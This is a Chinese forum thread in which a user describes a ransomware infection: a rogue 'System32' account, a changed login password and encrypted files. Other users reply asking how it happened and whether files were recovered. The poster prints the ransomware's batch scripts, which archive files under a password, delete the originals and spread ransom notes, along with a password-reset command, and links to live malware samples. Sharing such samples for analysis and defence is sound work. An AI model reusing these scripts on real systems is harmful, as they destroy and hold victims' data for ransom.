【勒索病毒】早晨开机发现密码错了，再查发现多了一个System32用户，再查发现勒索病毒

s1711880582

今天早晨开机密码不对了，再查发现多了一个System32用户，进PE改密码进系统，在360杀毒的时候，再查发现勒索病毒的文件，360未报毒，关机进Ubuntu查看文件，只加密了几个文件（貌似），还在搜索。
在我的Users/THHICV/Videos/Windows01目录下有：

C.bat  D.bat  E.bat  F.bat  README_WARNING.TXT  update.exe
C.txt  D.txt  E.txt  F.txt  exclude.txt 

C.bat貌似是用来生成索引文件的：

dir /b /s /a-d "C:\" 2>nul| findstr /ilv /c:"%ProgramFiles%" /c:"%windir%" /c:"%serprofile%\appdata" /c:"%ProgramData%" >C.txt

setlocal enabledelayedexpansion
set key=%1
set start="update.exe"
set fl=C.txt

for /f "delims=" %%i in (%fl%) do (
  for /f "delims=" %%j in ("%%i") do (
    %start% a -p%key% -inul -y -m0 -k -mt64 -ibck -ep -afzip -df -x@exclude.txt "%%~dpj\%%~nxj.[u%itwsgmjnerbqiy%n%wwegbxiyutaux%l%ejvo%o%xfkqbjoucu%c%fdnnbcm%k%lacsxihatqaleu%e%cndivspiz%r%vgpwll%@%yzdol%o%eizmrqt%n%qnhjvqacbrxw%i%ktvruxt%o%ekzuoqli%n%knsvcjnnxjkmjg%m%qkdvadmmnmbc%a%fqcptoco%i%uwjmlauycgvxh%l%bointflz%.%intwoyc%o%wbdxvxsxtnvv%r%ssgzd%g%ckauaeaslpysje%].id[%key:~-5%].lock" "%%i"
  )
)

for /r "C:\Users" %%f in (.) do (
    copy "README_WARNING.TXT" "%%~ff" > nul
)

DEL C.txt

del %0
exit

C.txt每一行就是一个文件。

s1711880582

[Shell] 纯文本查看 复制代码

以下是改密码的文件
net user %username% GKZCeSvuW2sD
taskkill /f /im wscript.exe
timeout /t 2
start window.vbs
exit

s1711880582

shojnhv 发表于 2022-4-5 08:53
楼主一看就是技术帝，想知道你最近做了什么动作，浏览了什么网站等，才中招的，学习一下，避免也中招

不知道怎么中招的，头一天安装了一个wireshark,github找了几个python的爬虫跑了下，没有其他操作

s1711880582

病毒样本：https://wwm.lanzout.com/iQjt702lap3c
病毒样本：https://wwm.lanzout.com/iCdpz02lap2b

文件被加密为 多模态烟火监测系统.docx.[unlocker@onionmail.org].id[LdpBv].lock

shojnhv

楼主一看就是技术帝，想知道你最近做了什么动作，浏览了什么网站等，才中招的，学习一下，避免也中招

flyjerry

有点困难

chenhui1986

学习了，感谢分享

handianduo

请问楼主恢复文件了没？我昨天中招，症状几乎完全一样。。。

s1711880582

handianduo 发表于 2022-4-23 18:19
请问楼主恢复文件了没？我昨天中招，症状几乎完全一样。。。

未恢复，发现的及时，只加密了我回收站的8W个数据集文件和2个WORD文档，我直接删了，沙雕病毒

junjun1802

s1711880582 发表于 2022-4-26 15:05
未恢复，发现的及时，只加密了我回收站的8W个数据集文件和2个WORD文档，我直接删了，沙雕病毒

linux有啥安全措施吗？